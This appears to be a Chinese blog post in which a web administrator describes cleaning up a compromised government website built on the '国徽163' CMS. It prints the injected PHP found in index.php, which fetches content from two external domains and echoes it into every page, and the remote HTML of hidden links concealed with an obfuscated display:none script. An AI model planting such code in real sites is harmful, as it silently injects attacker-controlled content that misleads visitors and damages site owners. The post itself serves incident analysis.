在进入现在所在公司面试时,网站安全性我感觉公司就很看重,接连政府网站出现问题,不少人都忧心忡忡,公司气氛变的异常紧张,最终以一个人的牺牲为代价换来整体运营的继续,以前在小的网络公司也是经常遇到网站挂马问题,那时候刚毕业解决手段也很机械简单,故也没积累啥宝贵实战经验,在新公司由于网站非常非常多,遇到网站挂马就是家常饭了,由于现在公司已经有技术人员在维护,所以一般也不好插手,偶然的机会接触两个一个挂马网站,感觉现在的挂马手段真是很厉害,我就想记录一下吧。

现在政府网站很多是国徽163的,用的先进的单一入口模式,说到挂马,首先想到的就是模板文件被篡改,这次在网站最顶部加入了挂马链接,模板文件也没有,Dreamweaver也扫不出来,我就想是不是加载了一段js脚本,由于对国徽163系统的不熟悉,一直找不到突破口,经过高手指点,说有可能在index.php挂马,我就想这就是单一入口的漏洞吧,在index.php挂马会导致网站所有页面都挂马了,因为所有网站都的通过index.php路由过去,如下是挂马代码:

<?php
$foot="data3/53-g.html"; 
$get=@file_get_contents("http://www.0750city.cn/data/flashdata/default/domain/2.html");//2.htm的
本质是http://www.xsnyzx.com/data/flashdata/default/data/
if($get){$footer=@file_get_contents($get.$foot);}echo $footer;//最终输出的是      http://www.xsnyzx.com/data/flashdata/default/data/data3/53-g.html 
?>在index.php顶部添加了如上代码

http://www.xsnyzx.com/data/flashdata/default/data/data3/53-g.html 网页内容如下:
<div id="life"> 
<a href="***********">****</a><!--挂马链接--> 
</div><script>document.getElementById("life"+"").style.display="n"+"o"+"ne";</script>;